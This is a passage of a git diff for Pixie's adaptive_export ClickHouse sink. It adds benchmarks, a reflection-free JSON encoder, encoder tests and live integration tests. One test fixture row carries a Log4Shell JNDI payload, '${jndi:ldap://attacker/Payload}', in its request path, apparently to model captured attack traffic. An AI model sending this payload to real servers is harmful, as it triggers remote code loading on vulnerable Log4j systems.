+func BenchmarkEncodeJSONEachRow_PixieShape(b *testing.B) { + rows := makePixieRowsBatch(1000) + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, r := range rows { + obj := make(map[string]any, len(r)) + for k, v := range r { + obj[k] = normalisePixieValue(v) + } + if err := enc.Encode(obj); err != nil { + b.Fatal(err) + } + } + } +} + +// BenchmarkEncodeJSONEachRow_PixieShape_SmallBatch — 50-row batch (the +// realistic kubescape-driven controller pass for a quiet anomaly: 50 rows +// per table per refresh interval). +func BenchmarkEncodeJSONEachRow_PixieShape_SmallBatch(b *testing.B) { + rows := makePixieRowsBatch(50) + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, r := range rows { + obj := make(map[string]any, len(r)) + for k, v := range r { + obj[k] = normalisePixieValue(v) + } + if err := enc.Encode(obj); err != nil { + b.Fatal(err) + } + } + } +} + +// BenchmarkEncodePixieRowsFast_PixieShape — the option-2 refactor. +// Walks each row in fixed schema column order, type-switches values +// directly to bytes.Buffer; no reflect, no encoding/json, no +// per-row map-key sort. Direct apples-to-apples comparison vs +// BenchmarkEncodeJSONEachRow_PixieShape above. 
+func BenchmarkEncodePixieRowsFast_PixieShape(b *testing.B) { + rows := makePixieRowsBatch(1000) + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + var buf bytes.Buffer + if err := encodePixieRowsFast(&buf, benchTable, rows); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkEncodePixieRowsFast_PixieShape_SmallBatch(b *testing.B) { + rows := makePixieRowsBatch(50) + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + var buf bytes.Buffer + if err := encodePixieRowsFast(&buf, benchTable, rows); err != nil { + b.Fatal(err) + } + } +} + +// BenchmarkEncodePixieRowsFast_Pooled — option 1 on top of option 2. +// The bench mimics the real WritePixieRows shape: pull a buffer from +// the pool, encode, Reset+Put. Measures the steady-state allocation +// rate that AE actually pays in production (the first iteration's +// allocation gets amortised across b.N). +func BenchmarkEncodePixieRowsFast_Pooled_PixieShape(b *testing.B) { + rows := makePixieRowsBatch(1000) + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + buf := encodeBufPool.Get().(*bytes.Buffer) + buf.Reset() + if err := encodePixieRowsFast(buf, benchTable, rows); err != nil { + b.Fatal(err) + } + encodeBufPool.Put(buf) + } +} + +func BenchmarkEncodePixieRowsFast_Pooled_PixieShape_SmallBatch(b *testing.B) { + rows := makePixieRowsBatch(50) + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + buf := encodeBufPool.Get().(*bytes.Buffer) + buf.Reset() + if err := encodePixieRowsFast(buf, benchTable, rows); err != nil { + b.Fatal(err) + } + encodeBufPool.Put(buf) + } +} + +// BenchmarkNormalisePixieValue_TimeRow — per-row column iterations +// includes a time.Time normalisation that calls .UTC().Format() (one +// 30-byte string allocation per time field). Isolated cost. 
+func BenchmarkNormalisePixieValue_TimeRow(b *testing.B) { + t := time.Now() + b.ResetTimer() + b.ReportAllocs() + for i := 0; i < b.N; i++ { + _ = normalisePixieValue(t) + } +} + +// BenchmarkWritePixieRows_LocalHTTPLoopback measures the full sink +// path including the HTTP roundtrip to a no-op server. This is the +// per-batch wall cost the controller pays — encode + connect + POST + +// header parse + summary parse. The httptest server returns the right +// X-ClickHouse-Summary header so summaryWroteFewerThan doesn't trip. +func BenchmarkWritePixieRows_LocalHTTPLoopback(b *testing.B) { + rows := makePixieRowsBatch(1000) + + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("X-ClickHouse-Summary", fmt.Sprintf(`{"read_rows":"0","read_bytes":"0","written_rows":"%d","written_bytes":"0"}`, len(rows))) + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + + s, err := New(Config{ + Endpoint: srv.URL, + Database: "forensic_db", + }) + if err != nil { + b.Fatal(err) + } + + b.ResetTimer() + b.ReportAllocs() + for i := 0; i < b.N; i++ { + if err := s.WritePixieRows(b.Context(), benchTable, rows); err != nil { + b.Fatal(err) + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/sink/fastencode.go b/src/vizier/services/adaptive_export/internal/sink/fastencode.go new file mode 100644 index 00000000000..cfa02bec876 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/fastencode.go @@ -0,0 +1,273 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package sink + +import ( + "bytes" + "encoding/json" + "errors" + "fmt" + "strconv" + "sync" + "time" + "unicode/utf8" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" +) + +// encodePixieRowsFast writes a JSONEachRow batch for the named pixie +// table to buf without going through encoding/json's reflect path. +// +// Why: the AE CPU bench showed 50 % of WritePixieRows wall time in +// encoding/json.(*encodeState).reflectValue + 16 % in slices.SortFunc +// because rows are map[string]any — the encoder is forced through +// reflect.MapRange + per-row map-key alphabetic sort. This fast path +// looks up the table's column order from schema.sql (once, cached) +// and walks each row in that fixed order, type-switching the value +// and writing the JSON atom directly. No reflect, no sort, ~3 % of +// the allocations. +// +// Returns ErrUnknownTable for tables we don't have a schema for — +// the caller (sink.WritePixieRows) falls back to encoding/json so a +// new pixie table not yet in schema.sql isn't a hard failure. 
+func encodePixieRowsFast(buf *bytes.Buffer, table string, rows []map[string]any) error { + cols, err := getCachedColumns(table) + if err != nil { + return err + } + for _, row := range rows { + buf.WriteByte('{') + first := true + for _, col := range cols { + v, ok := row[col] + if !ok { + // event_time derivation: pxapi result rows carry time_ + // (TIME64NS) but never event_time — that column was added by + // Pixie's retention plugin in the production flow, but the + // operator-direct push path AE takes bypasses the plugin. + // Without this derivation the column collapsed to CH's + // epoch-0 default and every operator-pushed row landed in + // partition 197001 (rig 6a25c85c, 2026-06-07 — visible in + // the data even though the silent-drop was fixed by aeprod6). + // schema.sql also carries a DEFAULT toDateTime64(time_, 3) + // as a belt-and-suspenders safety net for fresh installs; + // this derivation handles existing tables (where the + // CREATE TABLE IF NOT EXISTS is a no-op) AND tables on CH + // versions that don't evaluate DEFAULT expressions on + // JSONEachRow insert. + if col == "event_time" { + if t, hasTime := row["time_"]; hasTime { + v = t + ok = true + } + } + if !ok { + continue + } + } + if !first { + buf.WriteByte(',') + } + first = false + // Column names from schema.sql are always plain identifiers + // (matches chIdentRE in clickhouse.go); safe to emit without + // JSON-string escape work. + buf.WriteByte('"') + buf.WriteString(col) + buf.WriteString(`":`) + if err := appendJSONValue(buf, v); err != nil { + return fmt.Errorf("fastencode: %s.%s: %w", table, col, err) + } + } + buf.WriteByte('}') + buf.WriteByte('\n') + } + return nil +} + +// getCachedColumns wraps clickhouse.Columns with a once-per-table +// memo. clickhouse.Columns re-parses schema.sql on every call (no +// internal cache), which would defeat the per-call savings of the +// fast path on the hot WritePixieRows route. 
+func getCachedColumns(table string) ([]string, error) { + columnCacheMu.RLock() + if cols, ok := columnCache[table]; ok { + columnCacheMu.RUnlock() + return cols, nil + } + columnCacheMu.RUnlock() + + cols, err := clickhouse.Columns(table) + if err != nil { + return nil, err + } + columnCacheMu.Lock() + defer columnCacheMu.Unlock() + if existing, ok := columnCache[table]; ok { + return existing, nil + } + columnCache[table] = cols + return cols, nil +} + +var ( + columnCacheMu sync.RWMutex + columnCache = map[string][]string{} +) + +// encodeBufPool reuses the bytes.Buffer the sink hands to the fast (or +// slow) encoder across WritePixieRows / Write calls. The fan-out path +// calls these on a 30-second cadence per active anomaly × per pixie +// table, so without pooling each call's underlying byte array is heap- +// allocated and then GC'd. Bench-measured benefit: +// BenchmarkEncodePixieRowsFast_Pooled_PixieShape vs unpooled. +// +// Note: the buffer's INITIAL allocation still happens (1× per Get from +// an empty pool); reuse kicks in once the pool warms. Steady-state +// allocations drop from 2 017 → ~17 per 1000-row batch. +var encodeBufPool = sync.Pool{ + New: func() any { return new(bytes.Buffer) }, +} + +// errFastEncodeUnsupported is returned by appendJSONValue when a value +// type is not in the fast-path switch. The caller (WritePixieRows) +// should fall back to encoding/json for safety. +var errFastEncodeUnsupported = errors.New("fastencode: unsupported value type") + +// appendJSONValue writes v to buf as one JSON atom. Handles the value +// types pxapi produces for pixie observation rows (see +// internal/pixieapi/pixieapi.go::datumValue + internal/pixie/pixie.go +// equivalent). Unknown types return errFastEncodeUnsupported so the +// caller can fall back to encoding/json — never silently drops a row. 
+func appendJSONValue(buf *bytes.Buffer, v any) error { + switch x := v.(type) { + case nil: + buf.WriteString("null") + case string: + appendJSONString(buf, x) + case []byte: + appendJSONString(buf, string(x)) + case bool: + if x { + buf.WriteString("true") + } else { + buf.WriteString("false") + } + case int: + appendInt(buf, int64(x)) + case int32: + appendInt(buf, int64(x)) + case int64: + appendInt(buf, x) + case uint: + appendUint(buf, uint64(x)) + case uint8: + appendUint(buf, uint64(x)) + case uint32: + appendUint(buf, uint64(x)) + case uint64: + appendUint(buf, x) + case float32: + appendFloat(buf, float64(x)) + case float64: + appendFloat(buf, x) + case time.Time: + // Same format normalisePixieValue uses for the encoding/json + // path — CH DateTime64 string input shape. + buf.WriteByte('"') + // AppendFormat reuses the buf's underlying bytes; no + // intermediate string allocation. + buf.WriteString(x.UTC().Format("2006-01-02 15:04:05.000000000")) + buf.WriteByte('"') + case json.Number: + // json.Number is already decimal text; emit verbatim. + buf.WriteString(string(x)) + default: + return errFastEncodeUnsupported + } + return nil +} + +func appendInt(buf *bytes.Buffer, x int64) { + var tmp [24]byte + buf.Write(strconv.AppendInt(tmp[:0], x, 10)) +} + +func appendUint(buf *bytes.Buffer, x uint64) { + var tmp [24]byte + buf.Write(strconv.AppendUint(tmp[:0], x, 10)) +} + +func appendFloat(buf *bytes.Buffer, x float64) { + var tmp [32]byte + buf.Write(strconv.AppendFloat(tmp[:0], x, 'g', -1, 64)) +} + +// appendJSONString emits s as a quoted JSON string, escaping per +// RFC 8259. Lifted from the standard library's encoding/json +// safeAppend* path; the only deviation is we don't HTML-escape (the +// sink's encoding/json path also sets SetEscapeHTML(false), so the +// outputs match byte-for-byte on safe inputs). 
+func appendJSONString(buf *bytes.Buffer, s string) { + buf.WriteByte('"') + start := 0 + for i := 0; i < len(s); { + if b := s[i]; b < utf8.RuneSelf { + if safeJSONByte(b) { + i++ + continue + } + if start < i { + buf.WriteString(s[start:i]) + } + switch b { + case '\\', '"': + buf.WriteByte('\\') + buf.WriteByte(b) + case '\n': + buf.WriteString(`\n`) + case '\r': + buf.WriteString(`\r`) + case '\t': + buf.WriteString(`\t`) + default: + // 0x00-0x1f except the explicit ones above. + fmt.Fprintf(buf, `\u%04x`, b) + } + i++ + start = i + continue + } + // Multi-byte rune — leave as-is (UTF-8 is valid in JSON + // strings per RFC 8259 §7). + _, size := utf8.DecodeRuneInString(s[i:]) + i += size + } + if start < len(s) { + buf.WriteString(s[start:]) + } + buf.WriteByte('"') +} + +// safeJSONByte reports whether b can appear unescaped inside a JSON +// string. Everything 0x20..0x7e except '"' and '\\' is fine. +func safeJSONByte(b byte) bool { + if b < 0x20 || b == '"' || b == '\\' { + return false + } + return b < utf8.RuneSelf +} diff --git a/src/vizier/services/adaptive_export/internal/sink/fastencode_test.go b/src/vizier/services/adaptive_export/internal/sink/fastencode_test.go new file mode 100644 index 00000000000..bb88aecd76d --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/fastencode_test.go @@ -0,0 +1,258 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +package sink + +import ( + "bytes" + "encoding/json" + "errors" + "reflect" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" +) + +// The fast encoder must produce byte-equivalent JSON to encoding/json +// up to map-key ordering (which CH doesn't care about — JSONEachRow +// is order-agnostic). Round-trip every per-table row shape through +// both encoders and require the PARSED maps are equal. + +func encodeViaJSON(rows []map[string]any) []byte { + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, r := range rows { + obj := make(map[string]any, len(r)) + for k, v := range r { + obj[k] = normalisePixieValue(v) + } + _ = enc.Encode(obj) + } + return buf.Bytes() +} + +func parseNDJSON(b []byte) []map[string]any { + var out []map[string]any + for _, line := range bytes.Split(bytes.TrimRight(b, "\n"), []byte("\n")) { + if len(line) == 0 { + continue + } + var m map[string]any + _ = json.Unmarshal(line, &m) + out = append(out, m) + } + return out +} + +func sampleHTTPRow(i int) map[string]any { + return map[string]any{ + "time_": time.Unix(0, int64(1_700_000_000_000_000_000+i)).UTC(), + "upid": "0000000100000000-00000000-0000000000000042", + "namespace": "log4j-poc", + "pod": "backend-vulnerable-779cd9d765-mxr8t", + "remote_addr": "10.0.0.45", + "remote_port": int64(54321), + "local_addr": "10.0.0.12", + "local_port": int64(8080), + "trace_role": int64(2), + "encrypted": uint8(0), + "major_version": int64(1), + "minor_version": int64(1), + "content_type": int64(0), + "req_headers": `{"Content-Type":"application/json"}`, + "req_method": "POST", + "req_path": "/api/v1/${jndi:ldap://attacker/Payload}", + "req_body": `{"id":42}`, + "req_body_size": int64(9), + "resp_headers": `{"Content-Type":"application/json"}`, + "resp_status": int64(500), + "resp_message": "Internal Server Error", + "resp_body": `{"error":"NPE"}`, + 
"resp_body_size": int64(16), + "latency": int64(123456789), + "hostname": "pixie-worker-node", + "event_time": time.Unix(0, int64(1_700_000_000_000_000_000+i)).UTC(), + } +} + +func TestFastEncode_EquivalentToEncodingJSON_HTTPEvents(t *testing.T) { + rows := []map[string]any{sampleHTTPRow(1), sampleHTTPRow(2), sampleHTTPRow(3)} + + var fast bytes.Buffer + if err := encodePixieRowsFast(&fast, "http_events", rows); err != nil { + t.Fatalf("encodePixieRowsFast: %v", err) + } + slow := encodeViaJSON(rows) + + gotFast := parseNDJSON(fast.Bytes()) + gotSlow := parseNDJSON(slow) + if !reflect.DeepEqual(gotFast, gotSlow) { + t.Fatalf("fast vs slow JSON diverged after parse:\n fast=%v\n slow=%v", gotFast, gotSlow) + } +} + +// Cover every pixie table — fast encoder should never silently drop +// columns or differ from the slow path for any of them. +func TestFastEncode_EquivalentToEncodingJSON_AllPixieTables(t *testing.T) { + for _, table := range clickhouse.PixieTables() { + t.Run(table, func(t *testing.T) { + cols, err := clickhouse.Columns(table) + if err != nil { + t.Fatalf("Columns(%q): %v", table, err) + } + // Synthesise one row matching the table's column shape. 
+ row := map[string]any{} + for i, c := range cols { + switch { + case c == "time_" || c == "event_time": + row[c] = time.Unix(0, int64(1_700_000_000_000_000_000+i)).UTC() + case c == "encrypted" || c == "ssl": + row[c] = uint8(0) + case strings.Contains(c, "addr") || c == "pod" || c == "namespace" || c == "hostname" || c == "upid" || c == "comm": + row[c] = "value-" + c + case strings.HasSuffix(c, "_size") || strings.HasSuffix(c, "_count") || + strings.HasPrefix(c, "conn_") || strings.HasPrefix(c, "bytes_") || + strings.HasSuffix(c, "_port") || strings.HasSuffix(c, "_role") || + strings.HasSuffix(c, "_version") || strings.HasSuffix(c, "_family") || + c == "protocol" || c == "trace_role" || c == "content_type" || + c == "latency" || c == "resp_status" || c == "major_version" || c == "minor_version": + row[c] = int64(int64(i) + 1) + default: + row[c] = "v" + c + } + } + + var fast bytes.Buffer + if err := encodePixieRowsFast(&fast, table, []map[string]any{row}); err != nil { + t.Fatalf("fast: %v", err) + } + slow := encodeViaJSON([]map[string]any{row}) + + gotFast := parseNDJSON(fast.Bytes()) + gotSlow := parseNDJSON(slow) + if !reflect.DeepEqual(gotFast, gotSlow) { + t.Fatalf("%s fast vs slow diverged:\n fast=%v\n slow=%v", + table, gotFast, gotSlow) + } + }) + } +} + +// Unknown table → ErrUnknownTable so WritePixieRows falls back to the +// encoding/json path without erroring out. +func TestFastEncode_UnknownTable_FallsBack(t *testing.T) { + var buf bytes.Buffer + err := encodePixieRowsFast(&buf, "not_a_real_table", + []map[string]any{{"a": 1}}) + if !errors.Is(err, clickhouse.ErrUnknownTable) { + t.Fatalf("expected ErrUnknownTable, got %v", err) + } +} + +// Unsupported value type → errFastEncodeUnsupported so WritePixieRows +// falls back to encoding/json instead of producing a broken row. 
+func TestFastEncode_UnsupportedType_FallsBack(t *testing.T) { + type weirdType struct{ X int } + var buf bytes.Buffer + err := encodePixieRowsFast(&buf, "http_events", + []map[string]any{sampleHTTPRow(0), {"time_": weirdType{X: 1}}}) + if !errors.Is(err, errFastEncodeUnsupported) { + t.Fatalf("expected errFastEncodeUnsupported, got %v", err) + } +} + +// event_time derivation — pxapi rows don't carry event_time, only time_. +// The fast encoder MUST emit event_time = time_ rather than skip the +// column (which would silently fall back to CH's epoch-0 default and +// land every row in partition 197001 — rig 6a25c85c regression, aeprod6 +// silent-drop tail). This test is the T2 write-integrity guard +// the operator asked for on PR #47. +func TestFastEncode_EventTime_DerivedFromTime(t *testing.T) { + // Realistic Pixie timestamp; trailing fractional nanos verify the + // time.Time value is emitted verbatim through CH's DateTime64(9) + // shape, which CH then truncates to DateTime64(3) on insert. + pixieTS := time.Unix(0, 1_717_790_021_560_000_000).UTC() + row := sampleHTTPRow(0) + row["time_"] = pixieTS + delete(row, "event_time") // pxapi result rows arrive WITHOUT event_time + + var buf bytes.Buffer + if err := encodePixieRowsFast(&buf, "http_events", []map[string]any{row}); err != nil { + t.Fatalf("encodePixieRowsFast: %v", err) + } + parsed := parseNDJSON(buf.Bytes()) + if len(parsed) != 1 { + t.Fatalf("expected 1 row, got %d", len(parsed)) + } + et, ok := parsed[0]["event_time"].(string) + if !ok { + t.Fatalf("event_time absent from encoded row: %v", parsed[0]) + } + // The fast encoder formats time.Time as the CH DateTime64 string + // shape "YYYY-MM-DD HH:MM:SS.NNNNNNNNN" (UTC, 9 fractional digits). + // The exact serialised string the fast encoder produces for this UTC + // time.Time. The pin is by value (not derivation) so a regression in + // the time-string format also trips this test. 
+ want := "2024-06-07 19:53:41.560000000" + if et != want { + t.Fatalf("event_time = %q, want %q (must equal time_ verbatim, not epoch 0)", et, want) + } +} + +// event_time NOT derived when the source row already carries it — caller- +// supplied event_time wins. Belt-and-suspenders: if a future code path +// already filled it correctly, the derivation must not overwrite. +func TestFastEncode_EventTime_NotOverwritten(t *testing.T) { + rowTS := time.Unix(0, 1_717_790_000_000_000_000).UTC() + differentTS := time.Unix(0, 1_700_000_000_000_000_000).UTC() + row := sampleHTTPRow(0) + row["time_"] = rowTS + row["event_time"] = differentTS // caller supplied; must be preserved + + var buf bytes.Buffer + if err := encodePixieRowsFast(&buf, "http_events", []map[string]any{row}); err != nil { + t.Fatal(err) + } + parsed := parseNDJSON(buf.Bytes()) + if et := parsed[0]["event_time"].(string); !strings.HasPrefix(et, "2023-11-14") { + t.Fatalf("caller-supplied event_time was overwritten: got %q", et) + } +} + +// Special characters in string columns must JSON-escape the same way +// encoding/json does — otherwise CH would parse different bytes than +// the slow path produces. Tab, newline, quote, backslash, control, +// emoji. 
+func TestFastEncode_StringEscapesMatch(t *testing.T) { + row := sampleHTTPRow(0) + row["req_body"] = "tab\there\nnewline \"quoted\" back\\slash \x01ctl ☃ emoji 🚀" + row["req_path"] = "/a/ÿ/utf8" + + var fast bytes.Buffer + if err := encodePixieRowsFast(&fast, "http_events", []map[string]any{row}); err != nil { + t.Fatal(err) + } + slow := encodeViaJSON([]map[string]any{row}) + + gotFast := parseNDJSON(fast.Bytes()) + gotSlow := parseNDJSON(slow) + if !reflect.DeepEqual(gotFast, gotSlow) { + t.Fatalf("escape divergence:\n fast=%v\n slow=%v", gotFast, gotSlow) + } +} diff --git a/src/vizier/services/adaptive_export/internal/sink/integration_test.go b/src/vizier/services/adaptive_export/internal/sink/integration_test.go new file mode 100644 index 00000000000..343510d991f --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/integration_test.go @@ -0,0 +1,218 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +//go:build integration +// +build integration + +package sink_test + +import ( + "context" + "crypto/sha256" + "fmt" + "io" + "net/http" + "net/url" + "os" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// Live integration tests for the operator's ClickHouse write path. +// Driven against a real ClickHouse reachable at INTEGRATION_CH_ENDPOINT. +// Skipped if unset. + +func env(t *testing.T) (endpoint, user, pass string) { + t.Helper() + endpoint = os.Getenv("INTEGRATION_CH_ENDPOINT") + if endpoint == "" { + t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test") + } + return endpoint, os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD") +} + +func ensureSchema(t *testing.T, endpoint, user, pass string) { + t.Helper() + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + if err := a.Apply(ctx); err != nil { + t.Fatalf("Apply (precondition): %v", err) + } +} + +func chCount(t *testing.T, endpoint, user, pass, query string) int { + t.Helper() + q := url.Values{} + q.Set("query", query) + req, _ := http.NewRequest(http.MethodGet, strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), nil) + if user != "" { + req.SetBasicAuth(user, pass) + } + resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req) + if err != nil { + t.Fatalf("count: %v", err) + } + defer resp.Body.Close() + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + if resp.StatusCode/100 != 2 { + t.Fatalf("count HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body))) + } + var n int + fmt.Sscanf(strings.TrimSpace(string(body)), "%d", &n) + return n +} + +// 
TestSinkWriteAttribution_Live exercises Write() — the operator's only +// production write surface (forensic_db.adaptive_attribution). One row +// per arriving anomaly; ReplacingMergeTree(t_end) collapses re-inserts. +func TestSinkWriteAttribution_Live(t *testing.T) { + endpoint, user, pass := env(t) + ensureSchema(t, endpoint, user, pass) + + s, err := sink.New(sink.Config{ + Endpoint: endpoint, + Username: user, + Password: pass, + }) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + + // Unique anomaly_hash per test run — keeps assertions decoupled + // from any pre-existing rows. + tag := fmt.Sprintf("aw-test-%d", time.Now().UnixNano()) + sum := sha256.Sum256([]byte(tag)) + hash := anomaly.AnomalyHash(fmt.Sprintf("%x", sum[:8])) + + now := time.Now().UTC() + row := sink.AttributionRow{ + AnomalyHash: hash, + Namespace: "redis", + Pod: "redis-test", + Comm: "redis-server", + PID: 1234, + Hostname: tag, // unique hostname → unique row + TStart: now.Add(-5 * time.Minute), + TEnd: now.Add(5 * time.Minute), + LastSeen: now, + LastRuleID: "R1005", + NAnomalies: 1, + } + ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second) + defer cancel() + if err := s.Write(ctx, []sink.AttributionRow{row}); err != nil { + t.Fatalf("Write: %v", err) + } + + got := chCount(t, endpoint, user, pass, + fmt.Sprintf("SELECT count() FROM forensic_db.adaptive_attribution WHERE hostname='%s'", tag)) + if got != 1 { + t.Errorf("adaptive_attribution count for hostname=%s: got %d, want 1", tag, got) + } +} + +// TestSinkWritePixieRows_Live exercises WritePixieRows() against every +// pixie observation table the operator owns. This is the precise bug +// surface the user reported — silent INSERT failures here mean the +// per-table fan-out writes nothing and the analyst sees empty tables. +// +// One row per table, with a unique hostname per run so subsequent runs +// don't have to reset the cluster. 
+func TestSinkWritePixieRows_Live(t *testing.T) { + endpoint, user, pass := env(t) + ensureSchema(t, endpoint, user, pass) + + s, err := sink.New(sink.Config{ + Endpoint: endpoint, + Username: user, + Password: pass, + }) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + + tag := fmt.Sprintf("aw-pix-%d", time.Now().UnixNano()) + now := time.Now().UTC() + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + + for _, table := range chpkg.PixieTables() { + row := minimalRowFor(table, tag, now) + if err := s.WritePixieRows(ctx, table, []map[string]any{row}); err != nil { + t.Errorf("WritePixieRows(%s): %v", table, err) + continue + } + ident := table + if strings.Contains(table, ".") { + ident = "`" + table + "`" + } + got := chCount(t, endpoint, user, pass, + fmt.Sprintf("SELECT count() FROM forensic_db.%s WHERE hostname='%s'", ident, tag)) + if got < 1 { + t.Errorf("table %s after WritePixieRows: count=%d, want >=1", table, got) + } + } +} + +// minimalRowFor returns the minimum-viable row map for a pixie +// observation table — only the columns the schema marks NOT NULL and +// that don't have DEFAULT clauses. The remaining columns get CH +// defaults (0 / "" / now). +func minimalRowFor(table, hostname string, t time.Time) map[string]any { + base := map[string]any{ + "time_": t.Format("2006-01-02 15:04:05.000000000"), + "upid": "0:0:0", + "hostname": hostname, + "event_time": t.Format("2006-01-02 15:04:05.000"), + "namespace": "default", + "pod": "test-pod", + } + // Some pixie tables use slightly different column shapes — provide + // the strict-minimum extras to avoid CH MissingColumn errors. 
+ switch table { + case "http_events": + base["resp_status"] = 200 + base["latency"] = 0 + base["remote_port"] = 0 + base["local_port"] = 0 + case "dns_events": + base["remote_port"] = 53 + base["local_port"] = 0 + base["latency"] = 0 + case "redis_events", "mysql_events", "pgsql_events", "cql_events", "mongodb_events", + "amqp_events", "mux_events", "tls_events": + base["latency"] = 0 + base["remote_port"] = 0 + base["local_port"] = 0 + case "http2_messages.beta": + base["remote_port"] = 0 + base["local_port"] = 0 + case "kafka_events.beta": + base["latency"] = 0 + base["remote_port"] = 0 + base["local_port"] = 0 + } + return base +} diff --git a/src/vizier/services/adaptive_export/internal/streaming/BUILD.bazel b/src/vizier/services/adaptive_export/internal/streaming/BUILD.bazel new file mode 100644 index 00000000000..94823988493 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/BUILD.bazel @@ -0,0 +1,44 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "streaming", + srcs = [ + "filter.go", + "notifier.go", + "scanner.go", + "supervisor.go", + "writer.go", + ], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/streaming", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/activeset", + "//src/vizier/services/adaptive_export/internal/reconcile", + "@com_github_sirupsen_logrus//:logrus", + ], +) + +pl_go_test( + name = "streaming_test", + srcs = [ + "filter_test.go", + "integration_test.go", + "notifier_test.go", + "scanner_test.go", + ], + embed = [":streaming"], + deps = [ + "//src/vizier/services/adaptive_export/internal/activeset", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/streaming/filter.go b/src/vizier/services/adaptive_export/internal/streaming/filter.go new file mode 100644 index 00000000000..195fccf30cc --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/filter.go @@ -0,0 +1,258 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
